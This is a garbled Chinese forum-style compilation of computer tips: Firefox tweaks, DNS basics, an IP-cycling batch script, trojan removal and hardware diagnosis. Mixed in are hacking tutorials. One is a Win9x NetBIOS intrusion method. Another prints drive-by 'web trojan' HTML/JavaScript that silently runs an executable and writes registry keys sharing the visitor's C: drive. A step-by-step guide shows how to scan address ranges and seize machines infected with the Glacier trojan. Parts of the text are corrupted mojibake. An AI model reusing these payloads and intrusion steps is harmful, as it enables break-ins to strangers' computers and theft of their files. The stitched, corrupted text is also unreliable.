第二步,在下面的清单中找到“network.http.pipelining” 然后双击“network.http.pipelining”将其值改成“true”
下面我们要做的就是找到“network.http.pipelining.maxrequests”并把它的值改的高一些,如果你改成30,意思就是要求它每次发送30个请求。
最后一步就是在Firefox任何一个地方点右键,选择“新建”—“整数”在弹出的对话框中输入“nglayout.initialpaint.delay”并将其值改为“0”,表示当浏览器收到网站回复的信息后能够快速的反应。
完全关闭FireFox后退出,再重新打开FireFox,你将会有不一样的速度体验,会有2—3倍的速度提升,有兴趣的朋友可以实验一下。
吉普赛人祖传的神奇读心术.它能测算出你的内心感应
提示:
在心中任意想一个两位数(或者说,从10~99之间任意选择一个数),把这个数的十位与个位相加,再把任意选择的数减去这个和。例如:你选的数是23,然后2 3=5,然后23-5=18
在图表中找出与最后得出的数所相应的图形,并把这个图形牢记心中,然后点击水晶球。你会发现,水晶球所显示出来的图形就是你刚刚心里记下的那个图形。
如果你把这个读心术的测试推荐给10个或更多的朋友,也许你就会明白一切,因为水晶球会让你神奇的感应到它是如何来读你的心!
本贴未经过本人允许,禁止转载。
回复后想知道水晶球的秘密或者想转载的朋友。可以直接来问我。(谢谢你的支持与合作)
DNS,DomainNameSystem或者DomainNameService(域名系统或者余名服务)。域名系统为Internet上的主机分配域名地址和IP地址。用户使用域名地址,该系统就会自动把域名地址转为IP地址。域名服务是运行域名系统的Internet工具。执行域名服务的服务器称之为DNS服务器,通过DNS服务器来应答域名服务的查询。
1、DNS就是域名服务器,他的任务就是确定域名的解析,比如A记录MX记录等等。
2、任何域名都至少有一个DNS,一般是2个。但为什么要2个以上呢?因为DNS可以轮回处理,第一个解析失败可以找第二个。这样只要有一个DNS解析正常,就不会影响域名的正常使用。
3、如何确定域名的DNS
很简单,到www.internic.net/whois.html输入你要查询的域名就可以看到了。这个是国际域名管理中心。唯一的权威。只要这里能查到某个域名,就表示域名是生效的。它说你什么时候到期,就是什么时候到期。
4、有效的DNS表示当前正在起作用的DNS服务器是谁,比如查询结果是NS.XINNETDNS.COM、NS.XINNET.CN(新网信海)就表示当前域名是由NS.XINNETDNS.COM、NS.XINNET.CN(新网信海)负责解析。其他DNS的设置,都是无效的。
5、DNS是可以修改的。修改以后需要24-72小时以后,全世界才能刷新过来。internic的信息一般在24小时以后可以看到。另外,修改的过程,并不表示域名会停止解析,只要你在2边都做好了解析。如果生效了就是新的DNS在起作用。如果没生效。就是旧的DNS在起作用。要么生效,要么不生效。不存在2个都不起作用的时间。所6、DNS是有缓存的。
1)访问者的电脑;2)你的ISP接入商。
简单举例:比如你访问www.askbaidu.com,你的电脑首先查询本机上有没有缓存www.askbaidu.com的记录。如果有就直接调用不再去查寻。就是说如果你前面刚访问过www.askbaidu.com,这个时候就算电信的DNS和NS.XINNETDNS.COM、NS.XINNET.CN(新网信海)都不能解析。也是能够正常解析出域名的。
清除本机DNS缓存方法很简单。关闭IE然后清除历史记录,或者重启电脑。然后还有一个就是isp接入商的DNS的缓存。isp就是当地网络接入商。比如我们这里的福建电信;福州网通、南平铁通等等。每个地方都是不一样的。isp的DNS和NS.XINNETDNS.COM、NS.XINNET.CN(新网信海)这样的DNS是不同的。NS.XINNETDNS.COM、NS.XINNET.CN(新网信海)只负责具体的解析,不负责缓存。isp的DNS只负责查询和缓存,不负责解析。
简单描述下刚才访问www.askbaidu.com的情况。如果本机上不存在www.askbaidu.com的记录。你的电脑就会去查询当地ISP的DNS。isp的DNS只有缓存。就是说他会检查有没有www.askbaidu.com的缓存。如果有,他就直接把www.askbaidu.com的记录发送给用户。用户也就能访问了。如果ISP的缓存里面也没有www.askbaidu.com的记录,那么他进一步去查询askbaidu.com的DNS是什么?然后再到对应的DNS上直接去取得数据,并返回给用户。当第一个用户访问了www.askbaidu.com以后,isp的dns上也就开始缓存了www.askbaidu.com的记录。以后他就不必再去NS.XINNETDNS.COM、NS.XINNET.CN(新网信海)去找了。除非有新的域名,他才会去查。比如访问bbs.askbaidu.com的时候,他就要重新去查了。
7、isp的DNS缓存是有时间限制的。一般是1个小时。前后2次间隔1个小时的话,他就去域名的DNS上重新取得数据。这里说的是最前面一次和当前的比较。也就是说如果时间差距较大,就重新去域名的DNS服务器上找。所以刷新就变的很有必要,否则缓存了一次以后。域名记录改了以后。ISP就永远不去找新的记录了。知道了这个原理以后,大家就会明白,为什么原来没有的记录注册并生效会很快。修改的话生效会很慢。就是因为缓存的原因。但如果没有缓存,访问的效率会很低,因为任何一次输入www.askbaidu.com都得跑到NS.XINNETDNS.COM、NS.XINNET.CN(新网信海)去查询记录。
备注:很多域名商的域名解析系统也不是实时刷新的。一般会设置下时间,比如10分钟.就是说,你设置了一个新的A记录以后,域名服务器会在10分钟内为你添加。目的就是为了节约服务器资源。怕客户的DNS不断的刷新记录。刷新记录肯定需要消耗一定的资源。而且刷新过程中是不能解析的。另外刷新过程大概5秒。就是说这个5秒内域名商的的DNS是不能用的。
具体如下:IP段为192.168.1.1-192.168.1.254,掩码为255.255.255.0,网关为192.168.1.255,要求执行批处理命令后,设定IP地址为192.168.1.1,延时5分钟后,把IP设为192.168.1.2,再延时5分钟后,设为192.168.1.3......以此类推,当IP设为192.168.1.254后,再返回到192.168.1.1开始设定,批处理文件不关就一直循环下去......第一步:把如下代码存成e:ipchange.bat
for /f "usebackq delims=: tokens=2" %%i in (`"ipconfig|find "IP Address" "`) do set ipaddr=%%i
for /f "delims=. tokens=1,2,3,4*" %%i in ("%ipaddr%") do set /a ipaddr1=%%i &&set /a ipaddr2=%%j && set /a ipaddr3=%%k && set /a ipaddr4=%%l
set /a ipaddr4=%ipaddr4% 1
if %ipaddr4%==255 (netsh interface ip set address name="本地连接" source=static addr=192.168.1.2 mask=255.255.255.0 gateway=192.168.1.1 gwmetric=1) else netsh interface ip set addres name="本地连接" source=static addr=192.168.1.%ipaddr4% mask=255.255.255.0 gateway=192.168.1.1 gwmetric=1
第二步:用计划任务调用e:ipchange.bat,把如下代码存成.bat运行之:
@echo off
setlocal enabledelayedexpansion
set do=e:ipchange.bat
set m=5
set s=9999
set time=%time:~0,8%
set time=%time::=%
set a=%time:~0,2%
set b=%time:~2,2%
set c=%time:~-2%
set num=0
:top
set d=!b!
if "%b:~0,1%"=="0" set b=%b:~1,1%
set /a b =%m%
if %b% equ 60 (
set d=00
set /a a =1
echo !a!:!d!.!c!
if not "!do!"=="n" (if !s! gtr !num! (at !a!:!d!.!c! /interactive !do!))
set /a num =1
if !num! equ !s! pause&goto :eof
set b=!d!
goto top
)
if %b% gtr 60 (
set e=!b!
set /a b/=60
set /a a =!b!
set /a d=!e!-60*!b!
if "!d:~1,1!"=="" set d=0!d!
echo !a!:!d!.!c!
if not "!do!"=="n" (if !s! gtr !num! (at !a!:!d!.!c! /interactive !do!))
set /a num =1
if !num! equ !s! pause&goto :eof
set b=!d!
goto top
goto :eof
) else (
if "!b:~1,1!"=="" set b=0!b!
echo !a!:!b!.!c!
if not "!do!"=="n" (if !s! gtr !num! (at !a!:!b!.!c! /interactive !do!))
set /a num =1
if !num! equ !s! pause&goto :eof
goto top
goto :eof
)
程序说明:
1。你的系统计划任务必须开启状态(默认就是开启的,呵呵)
2。因为懒,没有写退出的句子,若不想继续变动ip了,运行at /delete /y就可以了。
黑客已经成为一种文化,很多人想成为黑客,他们偶尔学到了几种小花招,总喜欢拿别人开玩笑,搞些恶作剧。其实黑客的最高境界在于防守,不在于进攻。所谓明 枪易躲暗箭难防,要防住他人所有的进攻,肯定需要懂得比对方更多的系统知识,了解更多的系统漏洞,及如何弥补漏洞。 现在满天都是黑客教程,但真正有用的不多,下面介绍一种WIN9X下的入侵方法: 1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。 2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明 4.在Windows目录下有一文件名为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件: XX.XX.XX.XX 电脑名 5.开DOS窗口键入 NBTSTAT -R 6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击即可进入。 以上方法请不要乱用,本人对你用上面的方法所惹出的麻烦概不负责,请慎重。 对付上面进攻的最好办法就是隐藏你的IP地址
分类:计算机
大家对木马都不陌生了,它可能要算是计算机病毒史上最厉害的了,相信会使木马的人千千万万,但是有很多人苦于怎么把木马发给对方,现在随着计算机的普及,在网络上我相信很少有人会再轻易的接收对方的文件了,所以网页木马诞生了。
1.它应该算是html带动同路径下的一个exe的文件的主页了,也就是当浏览器浏览这个页面的时候,一个exe的文件就在后台自动下载并执行了,可以做一个test.html的文件在桌面,内容如下:
<script language="javascript">
run_exe="<OBJECT ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject""
run_exe ="CODEBASE="test.exe#version=1,1,1,1">"
run_exe ="<PARAM NAME="_Version" value="65536">"
run_exe ="</OBJECT>"
run_exe ="<HTML><H1>网页加载中,请稍后....</H1></HTML>";
document.open();
document.clear();
document.writeln(run_exe);
document.close();
</script>
再在桌面下随便找个exe的文件,名字一定要改为tset.exe,好了,这时候双击我们刚才生成的html文件,当看到“网页加载中,请稍后....”的时候,我们的那个同路径下的exe文件也被无条件执行了,这种页面的优点就是编译修改简单,但是!当你申请下了一个个人主页空间的时候,把这两个文件上传上去的时候,当你试图通过浏览器浏览你的杰作的时候,ie的安全警告跳了出来,我想没有几个人愿意乖乖的冒着风险去点“是”,好了,尽管这个网页木马在本地是多么的完美,但是放到了网上就通不过ie的安全策略了,这个小马失败了。
2.是通过ie自身的漏洞写入注册表,相信很多人经常在浏览一些主页的时候,注册表被改的乱七八糟、ie标题被改、首页被改、注册表编辑器被禁用等等,这些都是自动修改了你的注册表的网页的杰作,所以我门也可以做个页面让浏览者的硬盘完全共享,也是做个html的文件,内容如下:
script language=javascript>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
Shl.RegWrite ("HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\RWC$\Flags",402,"REG_DWORD");
Shl.RegWrite ("HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\RWC$\Type",0,"REG_DWORD"
);
Shl.RegWrite ("HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\RWC$\Path","C:\");
}
function init()
{
setTimeout("f()", 1000);
}
init();
</script>
当对方的浏览过这个页面的时候,他的c:就被共享了,共享后的进入方法嘛..呵呵不用说了吧,但是他虽然被共巷了,但是你还不知道谁正在看你的这个页面,他的ip又是多少你都不知道,没有关系,有个很简单的方法,去163申请一个域名的转换,如:http://dhj.126.com连接目标地址里...褪枪蚕砹恿恕?/a>
这种网页木马的特点是比较安全,不宜被对方发现,但是使用麻烦需要牵扯到很多的东西。
3.也是现在最好用的一种了吧,个人认为。它是将一个小巧的exe文件作成一个.eml的文件,再用ie的漏洞让一个html的页面执行这个.eml的文件,你的那个小巧的exe文件就被执行了,由于代码过长又因每个exe文件转换后的代码不同所以不可能一一写出,下面给出一个地址http://dhj.126.com实际上就是一个转...憧梢酝ü齮elnet x.x.x.x 3389来完全控制对方(这个5k的小后门是winshell5.0黑白网络有下,同时这个winshell5.0还有一个很出色的功能,就是能下载一个你事先设置好的指定路径下的一个文件,并执行他,我放置的是网络深偷,如果你的杀毒软件够厉害的话,神偷是可以被查出来的,这里只是实验,实际中可以指定很多查不到的小马,这里不阐述),有兴趣的朋友可以来试试。
这种网页木马的特点是,对方挨种率较高,除了制作麻烦一点外,没有什么缺点啦
好了所有的漏洞都是建立在系统漏洞的前提下,多升级多打补丁没有坏处
十三步入侵个人电脑
这道快餐是专门为从来没有通过网络进入过对方计算机的网络新手们准备的,主要使用的软件就是著名的国产木马冰河2.2,所以,如果你已经使用过冰河2.2,就不必跟着我们往下走了。其他有兴趣的网络新手们,Let's go!
第一步
下载必备的工具软件。1号软件就是端口扫描工具“网络刺客II”,2号软件就是著名的国产木马冰河2.2的控制端。
下载完毕并解压缩之后跟我进行第二步!
第二步
运行1号软件,首先出现的是“网络刺客II注册向导”,别理它,点击“稍后(Q)”就进入了网络刺客II的主界面。
第三步
在网络刺客II的主界面里选“工具箱(U)”-》“主机查找器(H)”,就进入了“搜索因特网主机”界面。
第四步
进入“搜索因特网主机”界面后,“起始地址”栏填XXX.XXX.0.0其中XXX.XXX自己去选择了,比如你可以选61.128或选61.200等等,“结束地址”栏填XXX.XXX.255.255其中XXX.XXX的选择要和前面一样。“端口”栏填7626,其他栏保持默认不动。
好了,以上设置就是要搜索从XXX.XXX.0.0到XXX.XXX.255.255这一段IP地址中有冰河木马的计算机了,再检查一下填对没有?如果一切OK,请点击“开始搜索”。
第五步
观察“总进度”和“段进度”是否在走动。如果没有走动,那一定是IP地址设置不对,请认真检查。如果两个进度都在走动,呵呵,你就成功一半了,至少你会使用网络刺客II扫描网上开放某一端口的计算机了。
下面你要作的就是静静的等待,学用黑客软件是需要耐心的。大约20-30分钟后,最下面的记录栏里就应该出现记录了(一般情况下,应该有5、6条记录)。每一条记录代表找到的中了冰河木马的一台计算机,前面是该计算机的IP地址,后面是7626(冰河木马端口)。
第六步
点击“停止搜索”,但不要退出程序,到第十二步时还要用。运行2号软件冰河,进入冰河主界面。选“文件[F]”-》“添加主机[A]”进入添加主机窗口。
第七步
在“添加主机”窗口,“显示名称”里填入第五步里搜索到的第一条IP地址,当IP地址填入“显示名称”里后,“主机地址”里就自动填入相同的IP了。“访问口令”不填,“监听端口”保持默认的7626。
好了,检查一下IP有没有填错,如果OK,点击“确定”,在冰河主界面的“文件管理器”里就出现了刚才填入的IP地址了。
第八步
这一步和下一步最重要,请认真看清楚!在冰河的主界面里,点击“文件管理器”里的“我的电脑”,这时“文件管理器”右边的框里就会出现你自己的硬盘分区。比如,如果你的硬盘分的是四个区,“文件管理器”右边的框里就会从上往下依次出现C:、D:、E:、F:,如果你的硬盘分的是两个区,就会出现C:、D:。
第九步
点击“文件管理器”里刚才输入的第一条IP地址,稍等片刻(网速慢的情况下约10-30秒),在“文件管理器”右边的框里就会出现对方计算机的硬盘分区了。看到了吗?看到了?呵呵,祝贺你,你已经成功地进入对方的计算机了!!!!!
第十步
你发现没有出现对方计算机的硬盘分区!!呵呵,别急,看看冰河主界面最下端的状态栏里有什么提示,如果是下面两种情况,就放弃,返回第七步,填入搜索到的第二条IP地址:
1、状态栏里出现“口令不对”、“口令错误”、“密码不对”、“密码错误”等之类的提示,表示该计算机的冰河木马是加了密码的,没有办法,只得放弃!
2、状态栏里出现“正在解释命令,可能是1.2以前版本”等之类的提示,也放弃,新手是搞不定的,如果以后你熟练了可以给对方升级,这是后话!!
第十一步
如果出现的是“主机没有响应”、“无法与主机建立连接”之类的提示,先别忙放弃,重复3-4遍第八步到第九步的操作,即点击“我的电脑”-》点击输入的IP地址,如此反复3-4遍后,还是不行的话再放弃,返回第七步,填入搜索到的下一条IP地址。
第十二步
如果所有搜索到的IP地址按照第七步至第十一步操作后都不能进入对方计算机,呵呵,那是你的运气太差!别急,这样的运气是经常碰到的!再返回第五步,在“搜索因特网主机”界面里点击“开始搜索”,这时该程序又从你停止的IP地址接着往下搜索了!!呵呵,等吧!!搜索吧!!只要你有时间,你一定能成功!
第十三步
终于成功了!我见到对方计算机硬盘分区了!呵呵,怎么样?你成功了,我的任务就完成了。进入对方计算机后,所有的操作和自己计算机“文件管理器”里的操作一模一样!就没什么黑不到过
忘了从哪里收集的了,有用就看了.
很多新手对安全问题了解比较不多,计算机中了特洛伊木马不知道怎么样来清除。虽然现在有很多的清除特洛伊木马的软件,可以自动清除木马。但你不知道木马是怎样在计算机中运行的,如果你看了这篇文章之后,你就会明白一些木马的原理。
1. 冰河v1.1 v2.2
冰河是国产最好的木马
清除木马v1.1
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
查找以下的两个路径,并删除
" C:windowssystem kernel32.exe"
" C:windowssystem sysexplr.exe"
关闭Regedit
重新启动到MSDOS方式
删除C:windowssystem kernel32.exe和C:windowssystem sysexplr.exe木马程序
重新启动。OK
清除木马v2.2
服务器程序、路径用户是可以随意定义,写入注册表的键名也可以自己定义。
因此,不能明确说明。
你可以察看注册表,把可疑的文件路径删除。
重新启动到MSDOS方式
删除于注册表相对应的木马程序
重新启动Windows。OK
2. Acid Battery v1.0
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的Explorer ="C:WINDOWSexpiorer.exe"
关闭Regedit
重新启动到MSDOS方式
删除c:windowsexpiorer.exe木马程序
注意:不要删除正确的ExpLorer.exe程序,它们之间只有i与L的差别。
重新启动。OK
3. Acid Shiver v1.0 1.0Mod lmacid
清除木马的步骤:
重新启动到MSDOS方式
删除C:windowsMSGSVR16.EXE
然后回到Windows系统
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的Explorer = "C:WINDOWSMSGSVR16.EXE"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices
删除右边的Explorer = "C:WINDOWSMSGSVR16.EXE"
关闭Regedit
重新启动。OK
重新启动到MSDOS方式
删除C:windowswintour.exe然后回到Windows系统
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的Wintour = "C:WINDOWSWINTOUR.EXE"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices
删除右边的Wintour = "C:WINDOWSWINTOUR.EXE"
关闭Regedit
重新启动。OK
4. Ambush
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的zka = "zcn32.exe"
关闭Regedit
重新启动到MSDOS方式
删除C:Windows zcn32.exe
重新启动。OK
5. AOL Trojan
清除木马的步骤:
启动到MSDOS方式
删除C: command.exe(删除前取消文件的隐含属性)
注意:不要删除真的command.com文件。
删除C: americ~1.0buddyl~1.exe(删除前取消文件的隐含属性)
删除C: windowssystemnorton~1regist~1.exe(删除前取消文件的隐含属性)
打开WIN.INI文件
在[WINDOWS]下面"run="和"load="都加载者特洛伊木马程序的路径,必须清除它们:
run=
load=
保存WIN.INI
还要改正注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的WinProfile = c:command.exe
关闭Regedit,重新启动Windows。OK
6. Asylum v0.1, 0.1.1, 0.1.2, 0.1.3 Mini 1.0, 1.1
清除木马的步骤:
注意:木马程序默认文件名是wincmp32.exe,然而程序可以随意改变文件名。
我们可以根据木马修改的system.ini和win.ini两个文件来清除木马。
打开system.ini文件
在[BOOT]下面有个"shell=文件名"。正确的文件名是explorer.exe
如果不是"explorer.exe",那么那个文件就是木马程序,把它查找出来,删除。
保存退出system.ini
打开win.ini文件
在[WINDOWS]下面有个run=
如果你看到=后面有路径文件名,必须把它删除。
正确的应该是run=后面什么也没有。
=后面的路径文件名就是木马,把它查找出来,删除。
保存退出win.ini。
OK
7. AttackFTP
清除木马的步骤:
打开win.ini文件
在[WINDOWS]下面有load=wscan.exe
删除wscan.exe ,正确是load=
保存退出win.ini。
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的Reminder="wscan.exe /s"
关闭Regedit,重新启动到MSDOS系统中
删除C:windowssystem wscan.exe
OK
8. Back Construction 1.0 - 2.5
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的"C:WINDOWSCmctl32.exe"
关闭Regedit,重新启动到MSDOS系统中
删除C:WINDOWSCmctl32.exe
OK
9. BackDoor v2.00 - v2.03
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的‘c:windowsnotpa.exe /o=yes‘
关闭Regedit,重新启动到MSDOS系统中
删除c:windowsnotpa.exe
注意:不要删除真正的notepad.exe笔记本程序
OK
10. BF Evolution v5.3.12
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
删除右边的(Default)=" "
关闭Regedit,再次重新启动计算机。
将C:windowssystem .exe(空格exe文件
这里有个小方法: 运行cmd
输入: “ CONVERT X: /FS: NTFS" 注: X代表需要转的盘名
之后就是一个漫长的转化过程了。waiting。。。。。。。
在电脑市场里最可怜的人要数那些将带有故障的电脑搬来搬去的人了。组装机与品牌机比起来虽然有她的长处,但没有良好的售后服务是她的致命短处。
大部分电脑故障是软件故障,因此在未确定是硬件故障前没必要将整台机器搬来搬去。即使是硬件故障,也没必要将整台机器搬去,只须将出故障的部件拿去即可。因此我们有必要了解硬件故障的诊断和测试方法,以后电脑出了故障不用将整台机器都搬去了(当然最好是不出故障!)。
故障及对策
如果想对电脑故障做全面的分析,那恐怕要写一本书,且那也并非易事。关于软件的故障在各类报刊上介绍过很多,因此这里只介绍硬件故障的症状,原因以及解决方法。
一、电脑启动过程
Ⅰ、首先来了解一下电脑的启动过程
1、贮存在ROM(只读存储器)中的Bootstrap Loader程序和自诊断程序移动到RAM(随机存储器)中。
2、随着Bootstrap Loader的运行,储存在辅助记忆装置中的操作系统将系统文件送到RAM中。
3、执行系统文件Io.sys和Msdos.sys。这时画面上出现“Starting Windowsn98……”的信息。
4、若有Config.sys则执行它。
5、执行系统文件的Command.com文件。
6、若有Autoexec.bat则执行它。
7、读取Windows的初始化文件“System.ini”和“Win.ini”,再读取注册表文件。
8、启动结束,出现初始画面,运行操作系统。
这个过程中,在主板的ROM BIOS中监测硬件是否异常,包括硬件故障,接线情况,各类卡的安装等。如果发生错误,画面上什么也不出现,启动停止。
这种情况下很可能是硬件故障。
Ⅱ、系统启动顺序
1、PC电源的ON——显示器,键盘,机箱上的灯闪烁。
2、检测显卡——画面上出现短暂的显卡信息。
3、检测内存——随着嘟嘟的声音画面上出现内存的容量信息。
4、执行BIOS——画面上出现简略的BIOS信息。
5、检测其他设备——出现其他设备的信息(CPU,HDD,MEM...)。
6、执行OS(操作系统)的初始化文件-Starting Windows 98等。
Ⅲ、在启动时主板中发出声音,通过这个声音可以判断是何种错误
根据主板形式的不同,声音的表示也有所不同.
AMI BIOS:
1短:内存刷新失败
2短:内存校验错误
3短:基本内存错误
4短:系统时钟错误
5短:CPU错误
6短:键盘错误
7短:实模式错误
8短:内存显示错误
9短:ROM BIOS校验错误
1长3短:内存错误
AWARD BIOS:
1短:启动正常
2短:非致命错误
1长1短:显示错误
1长2短:键盘错误
其他BIOS可查《BIOS错误提示音》,这里不再详细介绍。
二、易混淆的软件故障
必须明确地区分硬件故障和软件故障,否则费了很大的力气将电脑搬到电脑市场,店主告诉你是软件故障时你会是什么心情呢。特别是启动故障也有可能是软件故障造成的。下面我们就来看一看由软件故障造成的启动异常。
Ⅰ、CMOS Setup的错误
如果在CMOS Setup中的硬盘设置不正确的话,因为电脑无法识别硬盘,因此导致不能用硬盘中的操作系统(Windows)启动。出现画面但无法启动时应该检查CMOS Setup的内容。若要正确识别硬盘,可以使用CMOS Setup中的“IDE HDD Auto Detection”选项。
Ⅱ、系统文件的错误
Windows启动时需要Command.com, Io.sys, Msdos.sys, Drvspace.bin 四个文件。如果这些文件遭破坏,即使识别了硬盘也不能启动。这时可以使用“Sys.com”文件恢复这些文件。用启动盘启动后,键入“Sys c:”即可。
Ⅲ、初始化文件的错误
Windows在启动时要读取“Autoexec.bat”,“Config.sys”,“System.ini”,“Win.ini”,“User.dat”,“System.dat”六个文件。但在读取时若其中有错误的信息将发生启动失败。而这些文件是很难恢复的,因此要使用Windows重新设置等方法。但这不是硬件故障,用不着把电脑抱到电脑市场去。
Ⅳ、Windows的错误Windows初始画面出现后的故障大部分是软件的故障。程序间的冲突或驱动程序的问题等等。这样的问题可以用翻阅书籍等方法自行解决。
三、不是故障的硬件故障
虽然不是故障,但时常发生用户组装不正确或插口松等现象。这时可以自己打开电脑检查接线,插口等的错误。在新购硬盘,CD-ROM等EIDE设备时要注意将连接在中间的装置设置为“SlaveE”,将连接在边上的装置设置为“Master”,如果设置得不正确,有可能无法启动或使用相应装置时发生错误。
四、硬件故障的检测方法
下面我们来看一看硬件故障的基本测试方法。显示器没有任何图像出现时可以使用下面的方法测试出故障的部件。
一、首先准备一个工作台。
二、将主板从机箱拔出,再把主板上的所有部件拔出,只留下CPU和RAM.然后把主板放到工作台上。
三、将稳压电源连接在主板上。
四、将显卡插入AGP插槽。当然如果是PCI显卡则插入PCI插槽中。插入时要注意将显卡镀金的部分完全地插入插槽中。
五、连接显示器电源插口后将显卡与显示器连接起来。
六、打开显示器电源,再接通机箱电源开关。然后用金属棒接触主板的电源开关。
主板的电源开关是与机箱电源开关连接的部分,一般标记为“PWR SW”或“POWER SE”。
七、如果画面上出现BIOS的版本信息,画面没有异常的话,说明CPU,主板,RAM,显卡,电源都正常.通常,经常易出现故障的部件是“显卡”,“主板”,“硬盘”这个顺序。
八、然后连接硬盘和软区进行检测。接着连接CD-ROM检测,然后是声卡。Modem等一个一个的连接进行检测。如果不出现画面就说明后连接的那个部件有故障或是有兼容性问题。只须处理那个出故障的部件即可。
九、机箱的问题
有时将主板安装到机箱时发生问题,导致启动失败。因此如果在上面的部件检查中没有任何问题的话,可以将主板安装到机箱上测试。如果在测试中没有任何的错误,则说明是CMOS Setup错误,驱动程序等的软件问题。
检测电脑故障的简单方法
如果排除了“假故障”,那么就是真的有故障存在了!若再检测一下各配件的外观,包括打开机箱看到主机内部的各部件表面都没有被高电压击毁的迹象,或者明显的伤痕,若有的话,故障部件就清楚了。若都没有,可先试下面的处理方法。
1.清除尘埃
飘浮在空气中的尘埃是计算机一大杀手,使用一段后就可能因主板等关键部件积尘太多而出现故障,即便是在专用机房中也会如此。所以,对于使用了较长时间的计算机,应首先进行清洁,用毛刷轻轻刷去主板、外设上的灰尘。如果灰尘已清扫掉,或无灰尘,故障仍然存在,就表明硬件存在别的问题。
另外,由于板卡上一些插卡或芯片采用插脚形式,震动、灰尘等原因常会造成引脚氧化,接触不良。可用橡皮擦擦去表面氧化层,重新插接好后开机检查故障是否排除。
随便说一句,键盘使用日久往往会出现漏电、按键卡死等故障,此故障应及时处理,否则在输入文件时将会键入一些错误的字符。处理时应把键盘用一个托架托起来,按键向下,打开键盘的后盖,用酒精清洗线路板及按键的触点,并把卡死的按键下面的弹片适当撬起,使之恢复原有的弹性。
注意:软盘使用中,脏污或被划伤的软盘插入软驱时会划伤读写头,损坏软驱。清洗磁头时一定要十分谨慎,长时间不用的软驱,可能在磁头上会有锈蚀,此时不可使用清洗盘,具体做法是打开机箱将清洗剂滴在磁头上,浸泡半小时后,用脂棉小心地擦拭干净。如果盲目地使用清洗盘势必导致软驱读写头的损伤,使软驱报废。
2.看、听、闻、摸
“看”即观察系统板卡的插头、插座是否歪斜,电阻、电容引脚是否相碰,表面是否有烧焦痕迹,芯片表面是否开裂,主板上的铜箔是否烧断。当然了,不用说您也知道还要查看是否有异物掉进主板的元器件之间(这将造成短路),也可以看看板上是否有烧焦变色的地方,印刷电路板上的走线(铜箔)是否断裂等等。
“听”即监听电源风扇、软/硬盘电机或寻道机构、显示器变压器等设备的工作声音是否正常。另外,系统发生短路故障时常常伴随着异常声响,监听可以及时发现一些事故隐患和在事故发生前即时采取措施。
“闻”即辨闻主机、板卡中是否有烧焦的气味,便于发现故障和确定短路所在地。
“摸”即用手按压管座的活动芯片,看芯片是否松动或接触不良。另外,在系统运行时用手触摸或靠近CPU、显示器、硬盘等设备的外壳根据其温度可以判断设备运行是否正常;用手触摸一些芯片的表面,如果发烫,则为该芯片损坏。
3.拔插检测
前面说过,计算机产生故障的原因很多,主板自身故障、I/O总线故障、各种插卡故障均可导致系统运行不正常。采用拔插维修法是确定故障发生在主板或I/O设备的简捷方法。该方法就是关机后,将插件板逐块拔出,每拔出一块板就开机观察机器运行状态,一旦拔出某块后主板运行正常,那么故障原因就是该插件板故障或相应I/O总线插槽及负载电路故障。若拔出所有插件板后系统启动仍不正常,则故障很可能就在主板上。
拔插检测时,还能从另一个方面排除计算机故障:一些芯片、板卡与插槽接触不良,将这些芯片、板卡拔出后在重新正确插入可以解决因安装接触不当引起的微机部件故障。
4.交换检测
将同型号插件板,总线方式一致、功能相同的插件板或同型号芯片相互交换,根据故障现象的变化情况也可判断故障所在。此法多用于易拔插的维修环境,例如内存自检出错,可交换相同的内存芯片或内存条来判断故障部位,无故障芯片之间进行交换,故障现象依旧,若交换后故障现象变化,则说明交换的芯片中有一块是坏的,可进一步通过逐块交换而确定部位。如果能找到相同型号的微机部件或外设,使用交换法可以快速判定是否是元件本身的质量问题。
5.比较检测
运行两台或多台相同或类型相差不大的计算机,根据正常计算机与故障微机在执行相同操作时的不同表现可以初步判断故障产生的部位。
6.振动敲击检测
用手指轻轻敲击机箱外壳,若故障排除了,说明故障是由接触不良或虚焊造成的。然后,可进一步检查故障点的位置并排除之,只是此类故障难以检测到确切的部位。
7.升温降温检测
